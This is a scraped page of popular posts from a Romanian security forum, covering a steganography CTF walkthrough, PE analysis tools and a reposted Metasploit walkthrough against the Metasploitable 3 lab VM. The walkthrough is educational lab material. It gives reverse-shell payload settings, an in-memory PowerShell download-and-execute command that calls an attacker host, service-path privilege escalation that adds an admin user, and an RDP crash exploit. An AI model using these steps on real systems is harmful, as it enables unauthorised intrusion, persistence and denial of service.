Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 12/20/17 in all areas

  1. salut. am descoperit cum se calculeaza Hash-ul: - de tip CRC16_AUG_CCITT. (Polynomial 0x1021, Init value: 0x1D0F, Final Xor value: 0x00) - se calculeaza pe toata zona - ultimii doi bytes (16+16+14) - CRC-ul calculat trebuie intors (LSB MSB) Craciun fericit. //swimm3r
    2 points
  2. Pentru cine este interesat exista Data.gov.ro de unde se pot descarca in format CSV liste cu firme si informatiile aferente, listele sunt actualizate o data la 3 luni http://data.gov.ro/organization/onrc
    1 point
  3. Learn programming and devops in live environment anytime, anywhere A Beginner's Guide to LabEx If you are interested in programming but don't know where and how to get started, this course will show you the basic computer-related knowledge and how you can utilize LabEx's live environment to excel in IT by doing real practices. Stat Lab Linux Tutorial LabEx's experimental environment is based on Linux. If you are familiar with Linux then you can skip this tutorial and start exploring LabEx right away. If Linux sounds new to you, please follow every step in this tutorial. This course covers all the basic concepts you need to know. Start Lab Scrapy Tutorial: Web Scrapying LabEx and Github Scrapy uses an open source scraper framework implemented by Python. With the principle of "Do not Repeat Yourself", Scrapy provides a set of solutions for preparing the basic framework for scrapers and writing common problems in the process. This course will use LabEx and Github as examples to demonstrate how to complete a series of actions and commands. Start Lab More Courses Source: https://labex.io/
    1 point
  4. Poti incepe sa te ajuti prin a cauta pe forum arhivele cu tutoriale pt c++/java, sunt si in romana.Mai mult de atat ce vrei?
    1 point
  5. Salut, va multumim pentru sesizari, e vina mea pentru greseli si vom fi mai atenti in viitor. Am corectat imediat dupa ce am vazut greseala semnalata, intr-adevar trebuia acolo 2 miliarde si nu 2 milioane
    1 point
  6. Walkthrough: Facut pe Lubuntu 17.04 1. Descarcam imaginea si verificam daca este integra(cred ca am descarcat-o de trei ori pana sa o iau pe cea buna, in rest descarcam doar thumbnail-ul) deci pasul asta e destul de important. $ md5sum crack_me.jpg c720e708ab375e531bb77dca9dd08d38 crack_me.jpg # Deci e ok 2. Dupa cum observam, in imagine este un lacat cu trei rotite. O deschidem cu un editor hex si cautam sa vedem daca in afara de imagine mai este ceva. Ne uitam sa vedem daca dupa biti FF D9 mai este ceva: PK sa_nu_uitam.jpg Observam ca dupa biti de sfarsit al jpg-ului sunt initialele PK ceea ce inseamna ca avem o arhiva zip.(inițialele lui Phil Katz, creatorul formatului zip). In arhiva observam ca mai este o poza "sa_nu_uitam.jpg" 3. Incercam sa o dezarhivam, dar observam ca ne cere o parola, ne intoarcem la poza initiala si asteptam sa ne vina o idee. Prima idee e sa generam toate codurile posibile pentru acel lacat. Am folosit C++ pt asta(lucrez in el si mi-a fost mai usor): #include <iostream> using namespace std; int main() { char digits[] = "0123456789"; char pass[4]; pass[3] = 0; for( int i = 0; i < 10; i++) { pass[0] = digits[i]; for( int j = 0; j < 10; j++) { pass[1] = digits[j]; for( int z = 0; z < 10; z++) { pass[2] = digits[z]; cout << pass << endl; } } } return 0; } /// Il compilam iar cand il rulam ii redirectionam iesirea intr-un fisier: $ g++ main.cpp -o executabil $ ./executabil >> fisier.txt Se poate face in orice limbaj, aici aveti si ceva in python: https://stackoverflow.com/questions/22214949/generate-numbers-with-3-digits 4. Dupa ce am generat toate numerele e timpul sa trecem la bruteforce. Am folosit fcrackzip + am redenumit imaginea crack_me.zip(am schimbat extensia ca se plangea fcrackzip-ul): $ fcrackzip -D -p fisier.txt -u crack_me.zip 5. Primim confirmarea ca parola este : "PASSWORD FOUND!!!!: pw == 099". Dezarhivam si obtinem o nou imagine. 6. Repetam pasul doi si observam ca si aceasta imagine e tot o arhiva cu parola. Prima idee care mi-a venit in minte a fost sa incerc sa pun coordonatele boturilor avioanelor(cei care au jucat avioane stiu ca daca nimeresti botul avionul e pierdut). Asa ca am luat-o in ordine: avionul gri, cel albastru si cel portocaliu -> c2c8j5. Asta e parola. 7. Obtinem un fisier text "acum_e_acum.txt" cu mai cuvinte, fiecare pe o singura linie. La inceput am incercat Caesar's Cipher, dar fara vreun rezultata. Dupa ce am cerut un hint, mi s-a zis sa numar literele de pe fiecare linie. Deci vom avea: d o v g d u 6 - > F p j c d r 5 - > E a j i u g j s t k x r y 12 -> L c l f t c c p c g 9 -> I o l q 3 -> C z w w m y i l k a 9 -> I c o e g a p i c p f q h t j w x i p r t 20 -> T d 1 -> A e z v q o x b h d r g g d l t f z r 18 -> R n s v p m s r t l 9 -> I z m j j b 5 -> E p s r o g e m h p d d u v p k y y s a 19 -> S b e m p y l h o m m f w a j a o p c o s 20 -> T e j r q t u i u e 9 -> I g x m c o f a n b o q q w q u y t l i s a 21 -> U q b e g h l f b i f y o j k 14 -> N b y v a l i b t i h r z i c g l n t 18 -> R s h r f v i u h d g p q g s k 15 -> O g x c v s g q s u k v u s 13 -> M c 1 -> A z k o j u v l c l z w u h o 14 -> N k 1 -> A x i g c 4 -> D l c g b e 5 -> E x j t g r e i v d i r d s g d j t k j t g q 22 -> V n 1 -> A x k j k b c c u a j c p s t g m v e 18 -> R g 1 -> A m e k j w w o b j o y w w b u h a y p t 20 -> T Dupa ce am numarat literele fiecarui cuvant am pus in loc de numarul de litere, litera din alfabet care se afla la pozitia data de numarul literelor. Asa ca am obtinut: FELICITARI ESTI UN ROMAN ADEVARAT. Alte challenge-uri: [Easy] The big fat panda si The Eye of ... Multumesc @Usr6
    1 point
  7. Aici cititi. E destul de lung articolul. Sursa se vede.
    1 point
  8. Publicat pe 5 iul. 2017 Ad-hoc session working on pivoted packets through Meterpreter. Not finished, more to do, but small chunks of progress.
    1 point
  9. Step by step Metasploit walkthrough Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and more than often, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go. Step 1: Reconaissance Before actually hacking your way in, you need to find more information about your target. You have to find out the ip adress, running services and possible vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP adress of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own adress, so the ip adress of my host should be 192.168.0.206. Note: as I wrote this blogpost over a longer period, the used ip addresses later in this blogpost of the target machine can vary from 192.168.0.205 to 192.168.0.206 Let's continue with an Nmap scan to find running services: nmap -sV 192.168.0.206 Copy We find an Apache webserver running on port 8022. Let's look into that. Open firefox and enter the IP adress + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick google search learns us there is an exploit available! Bingo! Step 2: exploit a service to get a shell Now we have identified a vulnerable service and an available exploit, it's start to exploit the machine: Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering: search ManageEngine Copy After executing the search command, we find the Manage Engine Desktop Central 9 exploit we've found via google. To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete. use exploit/windows/http//manageengine_connectionid_write Copy Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here: RHOST: the target address. This will be the IP address of our target host - 192.168.0.206 RPORT: the target port. During our Nmap portscan, we found the service running on 8022. TARGETURI : the path for the Desktop Central software. Leave this is the standard setting. To set your own settings, you need to execute set SETTING value, e.g.: set RHOST 192.168.0.206 Copy set RPORT 8022 Copy Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage. Now we have setup the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will setup a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a windows command line or a Windows powershell. A very interesting payload is meterpreteter one because it is capable of so much more of simpy spawning a shell. Meterpreter is an advanced multi-function payload that is superior to other payloads because in contrast to other payloads that execute one command (such as adding a user or spawning a shell), meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, installing backdoor, privilege escalation and so on. Another significant advantage is that meterpeter fully resides in the memory by using DLL injection in existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by Antiviruses or Itrusion Detection Systems. To attach a meterpreter payload to our exploit, use the following command: set payload windows/meterpreter/reverse_tcp Copy If you run show options again now, you will see that Payloads options are visible now: LHOST: the host where the meterpreter will connect back to. This will be the address of our own Kali VM 192.168.0.241 LHOST: the port where the meterpreter will connect back to. Choose any available port you like or leave it on 4444. Set our listen adress to our own address: set LHOST 192.168.0.241 Copy We're set to fire the exploit. Simply type: exploit Copy As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell. Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are number of options available, but always try the easy way first. Execute getsystem to try Meterpreter to execute a few tricks in its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell. A very powerful Windows privilege escalation framework is Powersploit, written in Powershell. We downloaded and extracted the zip file on our Desktop in a folder Powersploit. We will start a web server with PowerShell, so we can easily call them via our meterpreter shell. Navigate to the unzipped folder and start a web server via the following command: We're set to fire the exploit. Simply type: python -m SimpleHTTPServer Copy Let's return to our Meterpreter session. It is possible to spawn a Powershell shell within Meterpreter but it's far easier to load scripts such as Powersploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the meterpreter session and add a PowerShell payload instead of a meterpreter payload to our exploit by entering the command below. Quickly check show options to verify if the listen address is still correct. set payload windows/powershell_reverse_tcp Copy And we have a PowerShell session! You can ignore the Invoke-Expression errors. This is where it gets a bit more advanced. We can not just download Powersploit to our target system, as this will more than likely raise red flags by Antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in the memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script in the memory, execute the following command in PowerShell: IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1") Copy Next, we execute a function from the scripts called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation. To make it easier to read, we will output the result to a file named allchecks.txt Invoke-AllChecks | Out-File allchecks.txt Copy To check-out the results, open a new terminal and launch a new instance of Metasploit and get the meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a meterpreter shell. To download the all-checks.txt file, execute download allchecks.txt with meterpreter. Download a copy of the allchecks.txt here. As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted servicepaths, hackable DLL locations, unattended install files, etc.. Let's focus on these unquoted servicepaths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added to. As services are run by the system user, this would mean that our custom command also is executed as system user. Nice! The catch however is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. By example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights. Maybe PowerSploit didn't catch all unquoted servicepaths. Let's check manually in our open meterpreter shell. First get a Windows Command Line by executing shell. Execute the following command: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Copy Using this method, we find 4 possible vulnerable services. One of these services, OpenSSHd was not in the list of PowerSploit. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the Readme of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group. Install-ServiceBinary -Name 'OpenSSHd' Copy Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck. There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot. We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002. Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and and execute it. This exploits sends a sequence of specially crafted RDP packets to an affected system causing it to crash and reboot. (make sure to watch your Metasploitable 3 VM when launching this exploit) Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the meterpreter shell. Spawn a Windows Command Line by executing shell and check with net users if our exploit worked. It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit Readme that his password is Password123!. Next step is to actually login with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details. Another cool trick is spawning a remote Desktop. Could be very usefull for enumeration of the box or disabling firewall (rules) if the PSExec should not work. Sursa: https://www.zero-day.io/metasploitwalkthrough/
    1 point
  10. The Portable Executable (PE) format is a file format for executables, object code, DLLs, FON Font files, and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code. [1] It is called "portable" because you can use it between different versions of Windows OS not among different distros (Linux/OSX). Hope you find it useful! Detect it Easy Exeinfo PE ExplorerSuite PEiD PEStudio Resource Hacker FileAlyzer PEBrowser PEview RunPE Detector [1]: Wikipedia
    1 point
  11. Util, mie imi place http://www.ntcore.com/exsuite.php
    1 point
×
×
  • Create New...